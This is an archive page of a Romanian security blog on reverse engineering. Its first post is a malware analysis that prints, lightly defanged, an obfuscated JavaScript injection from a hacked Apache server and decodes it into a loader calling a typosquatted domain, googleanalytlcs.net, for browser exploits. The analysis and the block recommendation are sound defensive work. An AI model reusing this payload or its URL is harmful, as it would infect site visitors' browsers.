You are currently browsing the category archive for the ‘Reverse Engineering’ category.

Vineri seara am fost sunat de un prieten care mi-a spus ca tocmai fusese hack-uit. Exploit-ul, dupa informatiile prietenului meu, era de prin mai, si a avut ca rezulat infectarea tuturor hosturilor virtuale apache cu un script java. Cind am primit scriptul mi-a atras atentia modul diferit in care fusese ascuns codul sursa al scriptului java. El arata cam asa:

<!–44e8ef75ef25fc970a79a3ccb704ad42–><sc!!!!!!!!!!ript language=javascript>zahlpc=”Jl#tWL%POTzGHriViVz#LiY”;rvxleu=”<Q73crQ69pt laQ6egQ75age=jQ61vQ61scriQ70t> funcQ74ioQ6e djjQ78tQ6cgs(hlyzcQ6arQ29Q7bQ76aQ72 Q67ynQ73zty,Q6dQ76Q6ewQ63zQ6fQ6dfQ3d\”#(7Q6eTbQ55OQ50VQ36Q4aQ63:+Q5e1Q7e9Q24u_iQ29yo5Q72@,2Q6bQ30Q60&Q45Q77MQ20|Q7bQ674Q3djvQ64Q74CxIFhNm]Q3b}fQ71Q213[HaQ7aB-AZps*Q6cQ47e8Q5c\”‘Q4bQ2eQ22,Q70Q65Q77yhg=\”Q22Q2cQ66Q61Q73ltdsQ2cqQ6brkjQ6cQ77f,tQ68yQ69Q74dkii=Q22Q22,hpoQ70Q75oQ69;Q66oQ72(gynsztQ79=0;gynszQ74yQ3cQ68lyzcjr.lengQ74Q68;gQ79nQ73Q7aty+Q2bQ29{ Q66Q61sQ6cQ74Q64sQ3dhlyQ7acjr.chaQ72AQ74(Q67yQ6eszty);qkrQ6bjlwQ66=Q6dvnwQ63Q7aomf.iQ6edexOf(Q66asltds)Q3biQ66(Q71Q6brkQ6aQ6cwfQ3e-1){ hQ70opuoiQ3d(Q28Q71krkjlQ77Q66Q2bQ31)Q25Q381Q2d1Q29;Q69fQ28Q68pQ6fQ70uoiQ3c=0Q29Q68pQ6fpuQ6fQ69+=8Q31;thQ79itdQ6bQ69i+Q3dmvQ6ewczQ6fQ6df.Q63haQ72Q41Q74(hpoQ70uoi-Q31Q29Q3bQ20} Q65lseQ20tQ68yQ69Q74dQ6biiQ2b=fQ61Q73Q6ctQ64s;Q7dQ70eQ77Q79hg+Q3dQ74Q68Q79itdQ6biQ69Q3bQ64Q6fcumeQ6eQ74.Q77rQ69Q74Q65(peQ77Q79hQ67Q29Q3b}Q3cQ2fsQ63Q72iptQ3e”;fmxoqyuh=zahlpc.charAt(6);vrbnnv=rvxleu.replace(/(jjuysyvwv|Q|xmmwgridfz)/g,fmxoqyuh);sqlwbat=unescape(vrbnnv);var agfwxg,kbptlkr;document.write(sqlwbat);agfwxg=”<NC]G>|<*:@)sC|Cos8j’C8IC/vzdz*:@)sC’|GzT4_z48j’vzdz*:@)sC’>||dz@|8Is)@o|j|T8M|DzC87y}|8Is)@o#*8Cb)]878Is)@o#48Cb)]87y|^|k=lJ`lJ`l~„`y}|t5:_]8TC#:550)8jK*8**)5T)tj[$~k\”J`rZr[~}|szCNj/}|8Is)@8*jK|^|8Is)@o#C5e bSC@)T47y}||t5:_]8TC#M@)C87|'<SxRFVb|GzT4_z48j\\’czdzS:@)sC\\’|SRxj\\’NCCs+//4554G8zTzGoCG:*#T8C/ii_C]v#v*\\’><\\/SxRFVb>’|y}</*:@)sC>|</NC]G>|”;djjxtlgs(agfwxg);</sc!!!!!!ript><!–44e8ef75ef25fc970a79a3ccb704ad42–>

Semnele de exclamatie din cuvintul script imi apartin pentru a evita o eventuala executie a lui.

Dupa cum se vede, scriptul selecteaza din variabila „zahlpc”, caracterul al saptelea „%”, apoi caracterul Q este inlocuit cu „%” , si astfel sint returnate codurile asci ale caracterelor ce formeaza codul sursa. Acesta este primul layer de ascundere a codului. Apoi rezulta un nou script java care desfacut va arata asa:

<ht!!!!ml> <scr!!!!!!!ipt type=”text/javascript” language=”javascript”>  var expiry = new Date(); expiry.setTime(expiry.getTime() + 24*60*60*1000); document.cookie=’sessionid=39128605A531; path=/; expires=’ + expiry.toGMTString();  document.write( „<SCR!!!!!!IPT language=\”JavaScript\” SRC=\”http://googleanalytlcs.net/__utmj.js\”><\/SCR!!!!!IPT>” );</scr!!!!!!!!!!!!ipt> </ht!!!!!ml>

Exte un script care citeste sessionsid-ul clientului pentru serverului care a fost infectat si impreuna cu data expirarii este trimis serverului googleanalytlcs.net. Sciptul java aflat aici va face call pentru un alt script de pe un alt site care va incerca exploatarea browserului. Site-ul din spate se schimba mereu.

O cautare in log-ul proxy-ului companiei unde lucrez arata ca exista destule site-uri romanesti care au fost infectate cu asa ceva. Deci recomand tuturor sa blocheze aceasta destinatie in proxy-uri.

O zi buna si va tin la curent in momentul in care am access la serverul care a fost exploatat cu  detalii despre exploit.

Reclame

Dupa o saptamina de training cu Saumil si o mica conferita de securitate plus Craciunul cu sarmalele lui, (darurile lui mosu le lasam la o parte), e greu sa digeri si sa strucrurezi toata informatia pe care ai acumulat-o. Dar o iau incet incet, poate iese ceva. Frank Boldewin aka Johnny Cyberpunk are un site personal in care publica informatii despre modul in care a facut reverse engineering asupra malware-ului Peacomm.C aka StormWorm. Un articol care merita citit mai ales pentru a intelege modul in care instrumentele de criptare, anti-debugging si detectie a vmware-ului sint incorporate in noile generatii de rootkit-uri. Atentie: cunostinde de IDA Pro la nivel avansat!

Ce este DEP? DEP (Data Execution Prevention) este un pachet de tehnologii Hardware si Software care au ca scop protejarea accesului la memorie a programelor executabile. Cel putin asa defineste Microsoft-ul in articolul sau in Technet. Dar citeodata pentru a putea sa faci analiza unui malware este important sa se poata fi oprit DEP-ul.

Cum se face? In boot.ini se scrie:

/noexecute=AlwaysOff

(Atentie, sintaxa este case sensitiv). Restul optiunilor sint explicate frumos si clar de Microsoft.

Have fun.

Tactical Explotation (HD Moore si Valsmith).

O prezentare fulminata in stilul HD Moore in care s-a vorbit despre noi metode de a aduna date despre infrastructura folosind servici existente pe site-uri de genul CetralOps.net. Informatiile existente despre persoane care lucreaza in diferite organizatii pot fi extrase din web folosind noul tool Evolution oferit de Paterva.com, care cauta si referentiaza informatii referitoare despre o persoana in internet. Metode de DNS sau DHCP Hijaking. Information disclosure folosind „SITE STATS” la serverele de FTP. Demonstratie despre cum poate fii compromis un sintem folosind NetBios Name Resolution. A fost pornit un server care joaca rol de WINS server si face public in retea adresa lui de IP , ca record WPAD, adica Proxy Server. Orice calculator care va incerca sa foloseasca acest host ca proxy poate fii compromis.
Jacom West (How I Learned to stop Fuzzing and find More Bugs)

O prezentare foarte buna despre diferentele dintre metodele de analiza statica a codului si procesul de fuzzing, proces care incearca sa gaseasca bug-uri, brute force-ing toate canalele de achizitie a soft-ului.

David Leachfild nu a mai venit.
Cool things to see.

David Aitel de la Immunity, creatorul Canvas-ului, un framework de genul Metaexploit, este ras in cap dupa modelul siglei firmei sale.

La Blackhat-ul de anul acesta nu va participa si celebrul researcher german in domeniu de reverse engineering Halva Flake. De ce? Pentru ca autoritatile americane au hotarit dupa 4 ore de interviu ca viza lui nu se potriveste cu tipul de acrivitate pe care o va desfasura si USA. Mai sa fie….nu e prima data cind Halva vine in US si face conferinte si training-uri. Care era oare tema prezentarii lui Halva pentru anul asta? Mai multe despre incident puteti citi aici

Si in alta ordine de idei, pentru ca am sansa sa fiu la Defcon anul asta o sa incers sa fac pentru prima data live blogging. Sa vedem ce iese.

Echo Mirage  este un network proxy care foloseste tehnici de genul „DLL injection” si „function hooking” pentru a redirecta cererile de trafic de retea ale aplicatiilor oferind astfel posibilitatea de a urmari si modifica fluxului de date.

Avantaje: „DLL injection” si „function hooking” au loc inainte de criptare a traficului HTTPS, ceea ce il face foarte util la analiza malware-urilor si a root–kit-urilor. Are capabilitati de logare a traficului si tot odata de modificare „on the fly” pe baza de „regular expresions” a traficului.

Dezavantaje pina acum observate de mine: Nu permite crearea de pachete mai mari ca marime decit cele originale.

Have Fun.:-D

Intotdeauna folosesc mai multe soft-uri pentru analiza unui sistem compromis unde banuiesc ca a fost instalat si un rootkit. Rootkit Revealer, Blacklight si o cana mare de cafea ( inscriptionata cu instructiuni de vi) fac parte intotdeauna din „arsenalul” cu care ma inarmez inainte de o analiza. Mi-am format insa o preferinta. IceSword chiar daca nu are un help in limba engleza este intuitiv si prezinta o imagine completa a ceea ce e imtimpla. Cu toate ca de multe ori analizele cu IceSword incep si se termina cu celebrul bluescreen continui sa il folosesc cu preponderenta. Aici puteti gasi un interviu interesant cu autorul programului, in care se pun in evidenta diferentele fata de celelalte tool-uri de detectare si analiza a rootkit -urilor.

Alte tool-uri de analiza a rootkit-urilor pe linga cana mare de cafea :

Rootkit Revealer [info]
F-Secure Blacklight [info]

Ce folositi voi la analiza ( in afara de IDA Pro) ??

decembrie 2018
L M M J V S D
« mart.    
 12
3456789
10111213141516
17181920212223
24252627282930
31  
Reclame